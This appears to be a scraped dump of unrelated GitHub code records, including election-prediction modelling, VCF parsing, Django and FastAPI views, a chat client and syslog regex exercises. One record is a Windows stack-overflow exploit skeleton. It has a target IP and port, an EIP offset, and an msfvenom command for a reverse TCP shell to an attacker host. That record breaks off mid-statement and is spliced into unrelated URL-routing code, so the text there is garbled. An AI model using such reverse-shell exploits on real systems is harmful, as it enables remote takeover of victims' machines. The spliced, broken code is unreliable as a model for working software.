lambda row: int(round(float(row.Population)*average_male_percent, 0))\n if row.Male_Population == 'U' else row.Male_Population, axis=1))\n new_df = new_df.assign(\n Female_Population=new_df.apply(\n lambda row: int(round(float(row.Population)*average_female_percent, 0))\n if row.Female_Population == 'U' else row.Female_Population, axis=1))\n\n # get mode for each categorical feature\n race_sex_mode = new_df['Race_Sex'].mode()\n ethnic_origin_mode = new_df['Ethnic_Origin'].mode()\n sex_mode = new_df['Sex'].mode()\n race_mode = new_df['Race'].mode()\n\n # convert NaN values into mode\n new_df = new_df.assign(Race_Sex=new_df['Race_Sex'].fillna(race_sex_mode[0]))\n new_df = new_df.assign(Ethnic_Origin=new_df['Ethnic_Origin'].fillna(ethnic_origin_mode[0]))\n new_df = new_df.assign(Sex=new_df['Sex'].fillna(sex_mode[0]))\n new_df = new_df.assign(Race=new_df['Race'].fillna(race_mode[0]))\n del new_df['Year']\n\n # write final df to csv\n new_df.to_csv('final_cleaned_prediction_data_9_30.csv', index=False)\n \n def compare_multiple_models(self):\n ### 0 == Dem (BLUE), 1 == Rep (RED)\n print('running models on dataset...')\n # import cleaned and imputed df, perform final conversions\n df = self.final_prediction_df\n # create dfs for running model\n final_df_data = df[df['Winner'].notnull()]\n prediction_df_2020 = df[df['Winner'].isnull()]\n\n ### test model by removing certain years from training set\n #final_df_data = final_df_data[final_df_data.Year != 1976]\n #final_df_data = final_df_data[final_df_data.Year != 1980]\n #final_df_data = final_df_data[final_df_data.Year != 1984]\n #final_df_data = final_df_data[final_df_data.Year != 1988]\n #final_df_data = final_df_data[final_df_data.Year != 1992]\n #final_df_data = final_df_data[final_df_data.Year != 1996]\n #final_df_data = final_df_data[final_df_data.Year != 2000]\n #final_df_data = final_df_data[final_df_data.Year != 2004]\n #final_df_data = final_df_data[final_df_data.Year != 2008]\n #final_df_data = final_df_data[final_df_data.Year != 2012]\n final_df_answer = final_df_data['Winner']\n\n # create dictionary of all individual year data\n years = [1976, 1980, 1984, 1988, 1992, 1996,\n 2000, 2004, 2008, 2012, 2016, 2020]\n test_dict = {}\n training_dict = {}\n for year in years:\n if year != 2020:\n test_dict[year] = final_df_data.loc[final_df_data['Year'] == year]\n else:\n test_dict[year] = prediction_df_2020\n training_dict[year] = final_df_data.loc[final_df_data['Year'] != year]\n del final_df_data['Winner']\n del final_df_data['Year']\n\n # separate df into training and test data\n x_train, 
x_test, y_train, self.y_test = train_test_split(final_df_data, final_df_answer, test_size=0.3, random_state=0)\n #x_train, x_val, y_train, y_val = train_test_split(x_train, y_train, test_size=0.25, random_state=0) # 0.25 x 0.8 = 0.2\n \n # instantiate models\n lr = LogisticRegression()\n rf = RandomForestClassifier(max_depth=7, random_state=13)\n svc = make_pipeline(StandardScaler(),\n LinearSVC(random_state=13,\n tol=1e-5,\n loss='squared_hinge',\n max_iter=100,\n fit_intercept=False))\n #class_weight='balanced'))\n sgd = SGDClassifier(max_iter=1000, tol=1e-3)\n knn = KNeighborsClassifier(n_neighbors=3)\n bayes = GaussianNB()\n\n # create variables for looping through models and outputting results\n models = [lr, rf, svc, sgd, knn, bayes]\n columns = ['Year', 'Logistic Regression', 'Random Forest', 'Support Vector Classification',\n 'Stochastic Gradient Descent', 'K-Nearest Neighbors', 'Naive Bayes']\n model_names = columns[1:]\n filename = 'Election_Accuracy_9_30.csv'\n counter = 0\n\n # create results output file\n with open(filename, 'w') as csvfile: \n csvwriter = csv.writer(csvfile)\n csvwriter.writerow(columns)\n \n years = [2008, 2012, 2016]\n # iterate through each individual model for each year\n for year in years:\n score_list = []\n score_list.append(year)\n y_train = training_dict[year]['Winner']\n del training_dict[year]['Winner']\n x_train = training_dict[year]\n y_test = test_dict[year]['Winner']\n del test_dict[year]['Winner']\n x_test = test_dict[year]\n\n for i, model in enumerate(models):\n model.fit(x_train, y_train)\n if year == 2020:\n predictions_2020 = model.predict(x_test)\n pd.options.mode.chained_assignment = None\n prediction_df_2020['Winner'] = predictions_2020\n prediction_df_2020.to_csv('predictions.csv', index=False)\n counter += 1\n # Save model\n #with open('churn_classifier_{}_{}.pkl'.format(model, counter), 'wb') as fid:\n # _pickle.dump(model, fid)\n #print('done fitting {} model'.format(model_names[i]))\n if year != 2020:\n score = model.score(x_test, y_test)\n score_list.append(round(score, 4))\n print('{}, {} performance: {}'.format(year, model_names[i], round(score, 4)))\n \n if year != 2020:\n # write to results output file\n with open(filename, 'a') as csvfile: \n csvwriter = csv.writer(csvfile) \n csvwriter.writerow(score_list)\n\n def run_best_model(self):\n print('running optimal model on dataset...')\n # import cleaned and imputed df, perform final conversions\n df = self.final_prediction_df\n # create dfs for running model\n final_df_data = df[df['Winner'].notnull()]\n prediction_df_2020 = df[df['Winner'].isnull()]\n del prediction_df_2020['Winner']\n del prediction_df_2020['Year']\n final_df_answer = final_df_data['Winner']\n del final_df_data['Winner']\n del final_df_data['Year']\n\n # separate df into training and test data\n x_train, x_test, y_train, self.y_test = train_test_split(final_df_data, final_df_answer, test_size=0.3, random_state=0)\n\n # instantiate model\n rf = RandomForestClassifier(max_depth=9, random_state=13)\n \n # fit model to training data, calculate score of test data, and predict 2020 election\n rf.fit(x_train, y_train)\n self.predictions = rf.predict(x_test)\n self.score = rf.score(x_test, self.y_test)\n print(self.score)\n predictions_2020 = rf.predict(prediction_df_2020)\n pd.options.mode.chained_assignment = None\n prediction_df_2020['Winner'] = predictions_2020\n prediction_df_2020.to_csv('predictions.csv', index=False)\n\n def plot_confusion_matrix(self):\n print('plotting 
confusion matrix...')\n # make seaborn confusion matrix\n cm = metrics.confusion_matrix(self.y_test, self.predictions)\n plt.figure(figsize=(9,9))\n sns.heatmap(cm, annot=True, fmt=\".3f\", linewidths=.5, square = True, cmap = 'Blues_r')\n plt.ylabel('Actual label')\n plt.xlabel('Predicted label')\n all_sample_title = 'Accuracy Score: {0}'.format(self.score)\n plt.title(all_sample_title, size = 15)\n plt.show()\n\n def compute_results(self):\n # import prediction results and manipulate df\n df_results = self.prediction_results_df\n winner_series_2 = df_results.groupby(['Code', 'Winner'])['Population'].sum()\n df_2 = winner_series_2.to_frame().reset_index()\n df_2.sort_values('Population', inplace=True)\n df_2.drop_duplicates(subset='Code', keep='last',inplace=True)\n df_2.sort_values('Code', inplace=True)\n df_2 = df_2.replace(1.0, 'RED')\n df_2 = df_2.replace(0.0, 'BLUE')\n # import overall 2020 population for percent win calculations\n pop_df = self.pop_data_2020_df\n pop_df = pop_df.groupby(['Code'])['Population'].sum().reset_index()\n\n # import datasets to align with results\n electoral_votes_per_state_per_year_dict = self.electoral_votes_per_state_per_year_dict\n df_3 = self.state_acronym_df\n\n # add up electoral votes for biden/trump and print winner results\n biden_counter = 0\n trump_counter = 0\n predicted_blue_states = []\n predicted_red_states = []\n winner_dict_2020 = {}\n percent_dict_2020 = {}\n all_blue_votes = 0\n all_red_votes = 0\n dem_states_won = 0\n rep_states_won = 0\n # iterate through df and populate dicts for plotting\n for i, row in enumerate(df_2.values):\n if row[1].strip() == 'BLUE':\n predicted_blue_states.append(df_3['State'][i])\n winner_dict_2020[df_3['Acronym'][i]] = row[1].strip()\n percent_dict_2020[df_3['Acronym'][i]] = round(\n (row[-1]/pop_df['Population'].iloc[i])*100-50,5)\n all_blue_votes += int(row[-1])\n biden_counter += electoral_votes_per_state_per_year_dict[2016][i]\n dem_states_won += 1\n elif row[1].strip() == 'RED':\n predicted_red_states.append(df_3['State'][i])\n winner_dict_2020[df_3['Acronym'][i]] = row[1].strip()\n percent_dict_2020[df_3['Acronym'][i]] = round(\n (row[-1]/pop_df['Population'].iloc[i])*100-50,5)\n all_red_votes += int(row[-1])\n trump_counter += electoral_votes_per_state_per_year_dict[2016][i]\n rep_states_won += 1\n\n # extrapolated voting population to calculate number of voters for each candidate\n voting_population_2020 = 129838306\n blue_vote_percent = (all_blue_votes/(all_blue_votes+all_red_votes))\n red_vote_percent = (all_red_votes/(all_blue_votes+all_red_votes))\n dem_pop_vote = int(round(voting_population_2020*blue_vote_percent,0))\n rep_pop_vote = int(round(voting_population_2020*red_vote_percent,0))\n dem_state_percentage = round(biden_counter/(biden_counter + trump_counter),4)\n rep_state_percentage = round(trump_counter/(biden_counter + trump_counter),4)\n\n # import Nate Silver 538 result percentages (as of 10/1)\n blue_state_polls_dict = self.probable_outcomes_538_dict[0]\n red_state_polls_dict = self.probable_outcomes_538_dict[1]\n\n # initialize variables for results comparison\n blue_state_polls = list(blue_state_polls_dict.keys())\n blue_state_percentages = list(blue_state_polls_dict.values())\n red_state_polls = list(red_state_polls_dict.keys())\n red_state_percentages = list(red_state_polls_dict.values())\n blue_for_sure = []\n probably_blue = []\n red_for_sure = []\n probably_red = []\n battleground_list = []\n agree_list = []\n disagree_list = []\n middle_ground_blue_list = []\n 
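# NOTE (editor): the loops below bucket each state by its 538 win probability:\n
# above 85 -> safe, above 65 -> leaning, anything else -> battleground.\n
# Hypothetical worked example (percentages invented for illustration):\n
#   blue_state_polls_dict = {'California': 99, 'Nevada': 70, 'Florida': 51}\n
#   -> blue_for_sure = ['California'], probably_blue = ['Nevada'],\n
#      battleground_list = ['Florida']\n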
middle_ground_red_list = []\n\n # identify 538 likely red/likely blue/battleground states\n for i, state in enumerate(blue_state_polls):\n if blue_state_percentages[i] > 85:\n blue_for_sure.append(state)\n elif blue_state_percentages[i] > 65:\n probably_blue.append(state)\n else:\n battleground_list.append(state)\n for j, state in enumerate(red_state_polls):\n if red_state_percentages[j] > 85:\n red_for_sure.append(state)\n elif red_state_percentages[j] > 65:\n probably_red.append(state)\n else:\n battleground_list.append(state)\n\n # cross-reference model results with 538 results\n for state in predicted_blue_states:\n if state in blue_for_sure or state in probably_blue:\n agree_list.append(state)\n elif state in battleground_list:\n if state in blue_state_polls:\n middle_ground_blue_list.append([state, 'BLUE: {}'.format(blue_state_polls_dict[state])])\n elif state in red_state_polls:\n middle_ground_blue_list.append([state, 'RED: {}'.format(red_state_polls_dict[state])])\n else:\n if state in blue_state_polls:\n disagree_list.append([state, blue_state_polls_dict[state]])\n elif state in red_state_polls:\n disagree_list.append([state, red_state_polls_dict[state]])\n for state in predicted_red_states:\n if state in red_for_sure or state in probably_red:\n agree_list.append(state)\n elif state in battleground_list:\n if state in blue_state_polls:\n middle_ground_red_list.append([state, 'BLUE: {}'.format(blue_state_polls_dict[state])])\n elif state in red_state_polls:\n middle_ground_red_list.append([state, 'RED: {}'.format(red_state_polls_dict[state])])\n else:\n if state in blue_state_polls:\n disagree_list.append([state, blue_state_polls_dict[state]])\n elif state in red_state_polls:\n disagree_list.append([state, red_state_polls_dict[state]])\n\n # print election results\n if biden_counter > trump_counter:\n print('BIDEN WINS: {} to {}'.format(biden_counter, trump_counter))\n elif trump_counter > biden_counter:\n print('TRUMP WINS: {} to {}'.format(trump_counter, biden_counter))\n\n # print results of model vs 538 predictions\n print('DISAGREE ON: {}'.format(disagree_list))\n print('MIDDLE GROUND BLUE: {}'.format(middle_ground_blue_list))\n print('MIDDLE GROUND RED: {}'.format(middle_ground_red_list))\n print('BLUE STATES: {}'.format(predicted_blue_states))\n print('RED STATES: {}'.format(predicted_red_states))\n\n # populate file with 2020 plotting results and write to output\n output_list = [winner_dict_2020, percent_dict_2020, biden_counter, trump_counter,\n dem_states_won, rep_states_won, dem_state_percentage, rep_state_percentage,\n 'Biden, Joe', 'Trump, Donald J.', dem_pop_vote, rep_pop_vote]\n with open('election_results_list_2020.txt', 'w') as f:\n for item in output_list:\n f.write(\"%s\\n\" % item)","repo_name":"tristanherink13/Election_Prediction","sub_path":"prediction.py","file_name":"prediction.py","file_ext":"py","file_size_in_byte":34957,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"44660831357","text":"#!/usr/bin/env python3\n\nimport time\nimport sys \nimport os\nimport re \nimport gzip\nimport PySimpleGUI as sg # provides the sg.popup error dialogs used below\n\n# If the user forgets to put the path to the directory, an error message is printed and the code is terminated \nif len(sys.argv) < 2:\n\tsg.popup('Please provide the path to the directory containing the vcf files as a command line argument !',\n\t\t\t\ttitle = 'ERROR', background_color = 'black', text_color = 'red', font = 50) \n\texit()\n# If the user enters more than one argument after the script file name and the path to the 
directory, an error message is printed and the code is terminated \nelif len(sys.argv) > 2:\n\tsg.popup('Wrong number of arguments. Make sure to ONLY provide the path to the directory containing the vcf files',\n\t\t\t\ttitle = 'ERROR', background_color = 'red', text_color = 'black', font = 50)\n\texit()\n# If the user correctly provides the path to the directory, it is saved in the variable directory_path\nelse:\n\tdirectory_path = sys.argv[1]\n\n# Loops into each of the directory's content \nfor file in os.listdir(directory_path):\n\t# Disregard any item that is not a file \n\tif os.path.isfile(os.path.join(directory_path, file)):\n\n\t\t# Disregard any file that is not a vcf file or a gzipped vcf file\n\t\tif file.lower().endswith(\".vcf\") or file.lower().endswith(\".vcf.gz\"):\n\t\t\t# Open file in read mode (gzipped files go through gzip in text mode)\n\t\t\tif file.lower().endswith(\".vcf.gz\"):\n\t\t\t\tcurrent_file = gzip.open(os.path.join(directory_path, file), \"rt\")\n\t\t\telse:\n\t\t\t\tcurrent_file = open(os.path.join(directory_path, file), \"r\")\n\t\t\t# Stores the lines of the file in a list, disregarding \\n lines \n\t\t\tfile_lines = [line.rstrip('\\n') for line in current_file]\n\t\t\theader = []\n\t\t\tinfo_meta_info = []\n\t\t\tfilter_meta_info = [] \n\t\t\tformat_meta_info = []\n\t\t\tbody = []\n\n\t\t\tfor line in range(len(file_lines)):\n\t\t\t\tif(re.match(r'^##', file_lines[line], re.MULTILINE)):\n\t\t\t\t\theader.append(line)\n\n\t\t\t\t\tif(re.match(r'^##INFO', file_lines[line], re.MULTILINE)):\n\t\t\t\t\t\tinfo_meta_info.append(file_lines[line])\n\n\t\t\t\t\telif (re.match(r'^##FILTER', file_lines[line], re.MULTILINE)):\n\t\t\t\t\t\tfilter_meta_info.append(file_lines[line])\n\n\t\t\t\t\telif (re.match(r'^##FORMAT', file_lines[line], re.MULTILINE)):\n\t\t\t\t\t\tformat_meta_info.append(file_lines[line])\n\n\t\t\t\telif (re.match(r'^#CHROM', file_lines[line], re.MULTILINE)):\n\t\t\t\t\tfixed_fields = (file_lines[line]).split(\"\\t\")\n\t\t\t\telse:\n\t\t\t\t\tbody.append(file_lines[line])\n\n\t\t\tCHROM = []\n\t\t\tPOS = [] \n\t\t\tID = [] \n\t\t\tREF = [] \n\t\t\tALT = [] \n\t\t\tQUAL = [] \n\t\t\tFILTER = [] \n\t\t\tINFO = []\n\n\t\t\tbody_info = [] \n\t\t\tfor i in body:\n\t\t\t\tbody_info = i.split(\"\\t\")\n\t\t\t\tCHROM.append(body_info[0])\n\t\t\t\tPOS.append(body_info[1])\n\t\t\t\tID.append(body_info[2])\n\t\t\t\tREF.append(body_info[3])\n\t\t\t\tALT.append(body_info[4])\n\t\t\t\tQUAL.append(body_info[5])\n\t\t\t\tFILTER.append(body_info[6])\n\t\t\t\tINFO.append(body_info[7])\n","repo_name":"melissaelfeghali/Functional-Genomics","sub_path":"NGS Exome Project/NGS_WholeExome_scripts/vcf.py","file_name":"vcf.py","file_ext":"py","file_size_in_byte":2634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"13629844161","text":"#!/usr/bin/python\nimport socket, time, struct\n\nip = \"172.16.32.128\"\nport = 31337\n\neip_off = 146\nbuf_supp = 1024\n\n#msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=192.168.91.129 LPORT=443 -b '\\x00\\x0a' -e x86/shikata_ga_nai -f python EXITFUNC=thread \nbuf = shellcodehere\n\nbuff = ''\nbuff += \"A\" * (eip_off - len(buff))\nbuff += struct.pack(\"\\w+)$', views.EntryListView.as_view(), name='entry-list'),\n re_path(r'^entry/detail/(?P<pk>[0-9]+)/$', views.DetailView.as_view(), name='detail'),\n re_path(r'^entry/add/$', views.EntryCreate.as_view(), name='entry-add'),\n re_path(r'^entry/update/(?P<pk>[0-9]+)/$', views.EntryUpdate.as_view(), name='entry-update'),\n re_path(r'^api/$', ChartData.as_view()),\n\n # re_path(r'api/chart/dash', ChartsView.as_view(), name='dash'),\n #\n # url(r'api/data/$', 
DashData.as_view()),\n #\n # url(r'^charts', ChartsView.as_view(), name='charts'),\n #\n # url(r'^api/data/$', get_data, name='api-data'),\n #\n # url(r'entry/(?P<pk>[0-9]+)/delete/$', views.EntryDelete.as_view(), name='entry-delete'),\n\n]\n","repo_name":"griggz/MySite","sub_path":"argent/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"30358015281","text":"import unittest\n\nfrom traitsui.testing.tester._abstract_target_registry import (\n AbstractTargetRegistry,\n)\nfrom traitsui.testing.tester._ui_tester_registry.default_registry import (\n get_default_registries,\n)\n\n\nclass TestDefaultRegistry(unittest.TestCase):\n def test_load_default_registries(self):\n registries = get_default_registries()\n for registry in registries:\n self.assertIsInstance(registry, AbstractTargetRegistry)\n\n self.assertGreaterEqual(len(registries), 1)\n","repo_name":"enthought/traitsui","sub_path":"traitsui/testing/tester/_ui_tester_registry/tests/test_default_registry.py","file_name":"test_default_registry.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","stars":290,"dataset":"github-code","pt":"6"} +{"seq_id":"25963843906","text":"# build a de-duplicated copy of the crawled text file\ncontent = []\n\nf = open(\"C:/Users/HYERIN/PycharmProjects/untitled/text/crawl_blog_food_3_존맛(3300).txt\",\"r\", encoding='utf-8')\nfor i in range(1,10000):\n line = f.readline() # read one line at a time\n content.append(line)\n if not line: break # stop once the whole file has been read\n\nf.close()\n\nprint(\"before : \", len(content))\ncontent = list(set(content))\nprint(\"after : \", len(content))\n\nfile = open(\"C:/Users/HYERIN/PycharmProjects/untitled/text/food.txt\",\"w\", encoding='utf-8')\nfor i in range(len(content)):\n file.write(content[i])\nfile.close()\n","repo_name":"2019-graduation-work/keras-modeling","sub_path":"0930text.py","file_name":"0930text.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"}
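# NOTE (editor): list(set(content)) in the script above removes duplicate lines\n
# but also shuffles the survivors. A hedged alternative that keeps first-seen\n
# order (dicts preserve insertion order on Python 3.7+):\n
#\n
#   content = list(dict.fromkeys(content))\n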
 +{"seq_id":"29465204283","text":"# Complete the function that accepts a string parameter, and \n# reverses each word in the string. All spaces in the string \n# should be retained.\n\n# Examples\n# \"This is an example!\" ==> \"sihT si na !elpmaxe\"\n# \"double spaces\" ==> \"elbuod secaps\"\n\ndef reverse_words(text):\n #go for it\n\n # create an empty list to hold the reversed words in the text\n reversed_word = []\n \n # loop through the text and split the words into a list\n for words in text.split(' '):\n \n # reverse each word and add it to the created list\n reversed_word.append(words[::-1])\n \n # join the words together and return it.\n return ' '.join(reversed_word)\n\n# import codewars_test as test\n# from solution import reverse_words\n\n# @test.describe(\"Fixed Tests\")\n# def fixed_tests():\n# @test.it('Basic Test Cases')\n# def basic_test_cases():\n# test.assert_equals(reverse_words('The quick brown fox jumps over the lazy dog.'), 'ehT kciuq nworb xof spmuj revo eht yzal .god')\n# test.assert_equals(reverse_words('apple'), 'elppa')\n# test.assert_equals(reverse_words('a b c d'), 'a b c d')\n# test.assert_equals(reverse_words('double spaced words'), 'elbuod decaps sdrow')","repo_name":"tuyojr/code_wars-hacker_rank-leetcode","sub_path":"code_wars/reverse_words.py","file_name":"reverse_words.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"39252699410","text":"from urllib.request import urlopen\nimport sys\nfrom bs4 import BeautifulSoup\n\n#print(urlopen('http://www.animeka.com/search/index.html?req=%s' % sys.argv[1]).read())\n\nb = BeautifulSoup(urlopen('http://www.animeka.com/search/index.html?req=%s' % sys.argv[1])) # &go_search=1&cat=search&zone_series=1&zone_episodes=1&zone_studios=1&zone_pers=1&zone_seriesf=1&zone_rlz=1&zone_team=1&type_search=all\nresults = list(b.select('.animestxt a'))\nif len(results) >= 1:\n for line in results:\n print(line['href'])\nelse:\n js = b.find('script').text\n print(js[js.index('\"') + 1:-1])\n","repo_name":"mangaki/mangaki","sub_path":"data/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":137,"dataset":"github-code","pt":"6"} +{"seq_id":"2003575319","text":"mynumber = input()\nx = mynumber.isnumeric()\n\nif x:\n print(\"Your number is: \\n\" + mynumber)\n\nelse:\n print(\"This is not a number.\\nTry again.\")\n mynumber = input()\n\n\n\n\n# REGEX ON LOG FILES\n\n\n# STEP 1: FIND THE LOG LINES WHERE SOME USER RAN CRON JOBS\n# STEP 2: REGEX TO EXTRACT THE USERNAMES FROM THOSE CRON LINES\n\nimport sys\nimport re\nlogfile = sys.argv[1] # first command line argument\nusernames = {} # tally of CRON runs per user\nwith open(logfile) as f:\n for line in f:\n if \"CRON\" not in line:\n continue\n print(line.strip())\n pattern = r\"USER \\((\\w+)\\)$\"\n result = re.search(pattern,line)\n if result is None:\n continue\n name = result[1]\n usernames[name] = usernames.get(name, 0) +1\n print(result[1])\n
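# NOTE (editor): worked example for the USER-extraction pattern above, using\n
# one of the sample log lines quoted further down in this file:\n
#\n
#   >>> import re\n
#   >>> line = \"Jul 6 14:01:23 computer.name CRON[29440]: USER (good_user)\"\n
#   >>> re.search(r\"USER \\((\\w+)\\)$\", line)[1]\n
#   'good_user'\n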
\n\n#\n# We're using the same syslog, and we want to display the date, time, and process id that's inside the square brackets.\n# We can read each line of the syslog and pass the contents to the show_time_of_pid function. Fill in the gaps to\n# extract the date, time, and process id from the passed line, and return this format: Jul 6 14:01:23 pid:29440.\n#\n# SAMPLE LOG LINES\n# Jul 6 14:02:08 computer.name jam_tag=psim[29187]: (UUID:006)\n# Jul 6 14:01:23 computer.name CRON[29440]: USER (good_user)\n# Jul 6 14:02:09 computer.name jam_tag=psim[29187]: (UUID:007)\n\nimport re\ndef show_time_of_pid(line):\n pattern = r\"(\\w+ \\d+ \\d+:\\d+:\\d+)+.*?\\[(\\d+)\\]\"\n result = re.findall(pattern, line)\n return \"{} pid:{}\".format(result[0][0], result[0][1])\n\nprint(show_time_of_pid(\"Jul 6 14:01:23 computer.name CRON[29440]: USER (good_user)\")) # Jul 6 14:01:23 pid:29440\n\nprint(show_time_of_pid(\"Jul 6 14:02:08 computer.name jam_tag=psim[29187]: (UUID:006)\")) # Jul 6 14:02:08 pid:29187\n\nprint(show_time_of_pid(\"Jul 6 14:02:09 computer.name jam_tag=psim[29187]: (UUID:007)\")) # Jul 6 14:02:09 pid:29187\n\nprint(show_time_of_pid(\"Jul 6 14:03:01 computer.name CRON[29440]: USER (naughty_user)\")) # Jul 6 14:03:01 pid:29440\n\nprint(show_time_of_pid(\"Jul 6 14:03:40 computer.name cacheclient[29807]: start syncing from \\\"0xDEADBEEF\\\"\")) # Jul 6 14:03:40 pid:29807\n\nprint(show_time_of_pid(\"Jul 6 14:04:01 computer.name CRON[29440]: USER (naughty_user)\")) # Jul 6 14:04:01 pid:29440\n\nprint(show_time_of_pid(\"Jul 6 14:05:01 computer.name CRON[29440]: USER (naughty_user)\")) # Jul 6 14:05:01 pid:29440","repo_name":"nieonek/crashcoursepython","sub_path":"INP+REGEXLOG.py","file_name":"INP+REGEXLOG.py","file_ext":"py","file_size_in_byte":2320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"21413800313","text":"from typing import Union\nfrom uuid import UUID\n\nfrom fastapi import APIRouter, Depends\nfrom starlette.responses import HTMLResponse, RedirectResponse\n\nfrom src.api.forms.plants import PlantCreateForm, PlantEditForm\nfrom src.api.middleware.context import context_middleware\nfrom src.api.middleware.response import TemplateResponse\nfrom src.database.models import Plant\n\nrouter = APIRouter(tags=[\"Plants\"], include_in_schema=False)\n\n\n@router.get(\"/\", status_code=200, response_class=HTMLResponse)\nasync def plants_dashboard(context: dict = Depends(context_middleware)) -> HTMLResponse:\n \"\"\"Displays a list of all plants.\"\"\"\n plants = await Plant.filter(is_accepted=False).prefetch_related(\n \"image\"\n ) # TODO: Change to True\n context[\"plants\"] = plants\n return TemplateResponse(\"plants/dashboard.html\", context)\n\n\n@router.get(\"/plants/{pk}\", status_code=200, response_class=HTMLResponse)\nasync def plant_details(\n pk: UUID, context: dict = Depends(context_middleware)\n) -> HTMLResponse:\n \"\"\"Displays the details of the given plant if it exists.\"\"\"\n plant = await Plant.get_or_none(pk=pk)\n if not plant:\n return TemplateResponse(\"shared/404-page.html\", context, 404)\n await plant.fetch_related(\"creator\", \"image\")\n context[\"plant\"] = plant\n return TemplateResponse(\"plants/details.html\", context)\n\n\n@router.get(\"/plant/create\", status_code=200, response_class=HTMLResponse)\nasync def plant_create_form(\n context: dict = Depends(context_middleware),\n) -> HTMLResponse:\n \"\"\"Displays the plant create form.\"\"\"\n if not context.get(\"user\"):\n return TemplateResponse(\"shared/403-page.html\", context, 403)\n return TemplateResponse(\"plants/create.html\", context)\n\n\n@router.post(\"/plant/create\", status_code=201, response_class=HTMLResponse)\nasync def plant_create(\n form: PlantCreateForm = 
Depends(),\n) -> Union[HTMLResponse, RedirectResponse]:\n \"\"\"Creates a plant instance based on form data.\"\"\"\n context = form.context.copy()\n if not form.context.get(\"user\"):\n return TemplateResponse(\"shared/403-page.html\", context, 403)\n await form.validate()\n if form.errors:\n context[\"errors\"] = form.errors\n return TemplateResponse(\"plants/create.html\", context, 422)\n plant = await form.create()\n return RedirectResponse(f\"/plants/{plant.uuid}\", 302)\n\n\n@router.post(\"/plant/delete/{pk}\", status_code=200, response_class=HTMLResponse)\nasync def plant_delete(\n pk: UUID, context: dict = Depends(context_middleware)\n) -> HTMLResponse:\n \"\"\"Deletes the plant if it exists and given user is its creator.\"\"\"\n plant = await Plant.get_or_none(pk=pk)\n if not plant:\n return TemplateResponse(\"shared/404-page.html\", context, 404)\n user = context.get(\"user\")\n await plant.fetch_related(\"creator\")\n if not user or not user == plant.creator:\n return TemplateResponse(\"shared/403-page.html\", context, 403)\n await plant.delete()\n context[\"messages\"] = [\"Plant has been deleted successfully\"]\n return TemplateResponse(\"plants/create.html\", context, 200)\n\n\n@router.get(\"/plant/edit/{pk}\", status_code=200, response_class=HTMLResponse)\nasync def plant_edit_form(\n pk: UUID, context: dict = Depends(context_middleware)\n) -> HTMLResponse:\n \"\"\"Displays the plant edit form for given plant if correct user is present.\"\"\"\n # TODO: Some `ViewHelper` class should deal with those initial `if` statements\n plant = await Plant.get_or_none(pk=pk)\n if not plant:\n return TemplateResponse(\"shared/404-page.html\", context, 404)\n user = context.get(\"user\")\n await plant.fetch_related(\"creator\")\n if not user or not user == plant.creator:\n return TemplateResponse(\"shared/403-page.html\", context, 403)\n await plant.fetch_related(\"creator\")\n await plant.fetch_related(\"image\")\n context[\"plant\"] = plant\n return TemplateResponse(\"plants/edit.html\", context, 200)\n\n\n@router.post(\"/plant/edit/{pk}\", status_code=200, response_class=HTMLResponse)\nasync def plant_edit(\n pk: UUID,\n form: PlantEditForm = Depends(),\n) -> HTMLResponse:\n \"\"\"Edits given plant with given form data.\"\"\"\n # TODO: Again, `ViewHelper` dependency...\n context = form.context\n plant = await Plant.get_or_none(pk=pk)\n if not plant:\n return TemplateResponse(\"shared/404-page.html\", context, 404)\n user = context.get(\"user\")\n await plant.fetch_related(\"creator\")\n if not user or not user == plant.creator:\n return TemplateResponse(\"shared/403-page.html\", context, 403)\n await form.validate()\n context[\"plant\"] = plant\n if form.errors:\n context[\"errors\"] = form.errors\n return TemplateResponse(\"plants/edit.html\", context, 422)\n await form.update(plant)\n context[\"messages\"] = [\"Plant has been edited successfully!\"]\n return TemplateResponse(\"plants/edit.html\", context, 200)\n","repo_name":"tobias-piotr/check-my-plants","sub_path":"server/src/api/v1/app/plants.py","file_name":"plants.py","file_ext":"py","file_size_in_byte":4862,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"29878611616","text":"import socket\r\nimport select\r\nimport sys\r\n\r\nif len(sys.argv)<3:\r\n sys.stdout.write(\"USAGE:chat_client.py hostname port\")\r\n sys.exit()\r\n\r\nhost = sys.argv[1]\r\nport = int(sys.argv[2])\r\n\r\ns = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\ns.settimeout(2)\r\ntry:\r\n 
s.connect((host,port))\r\nexcept:\r\n print(\"unable to connect\")\r\n sys.exit()\r\nprint(\"CONNECTED TO REMOTE HOST, YOU CAN START CHATTING\")\r\nsys.stdout.write('[Me]');sys.stdout.flush()\r\n\r\nwhile True:\r\n # watch the server socket for incoming data and stdin for user input\r\n # (the previous version bound a second socket to the server's own\r\n # address, which fails, and shadowed the socket module in the loop)\r\n rlist = [s, sys.stdin]\r\n read_list, w_list, error_list = select.select(rlist, [], [])\r\n\r\n for sock in read_list:\r\n if sock == s:\r\n data = sock.recv(4096)\r\n if data:\r\n sys.stdout.write(data.decode())\r\n sys.stdout.write('[Me]');sys.stdout.flush()\r\n else:\r\n print('Disconnected from server')\r\n sys.exit()\r\n else:\r\n msg = sys.stdin.readline()\r\n s.send(msg.encode())\r\n sys.stdout.write('[Me]');sys.stdout.flush()\r\n","repo_name":"karnvir1576/Chat_Room","sub_path":"chatclient.py","file_name":"chatclient.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"13821097826","text":"import torch.nn as nn\nimport torch\nfrom mmdet3d.models import FUSIONMODELS\nfrom 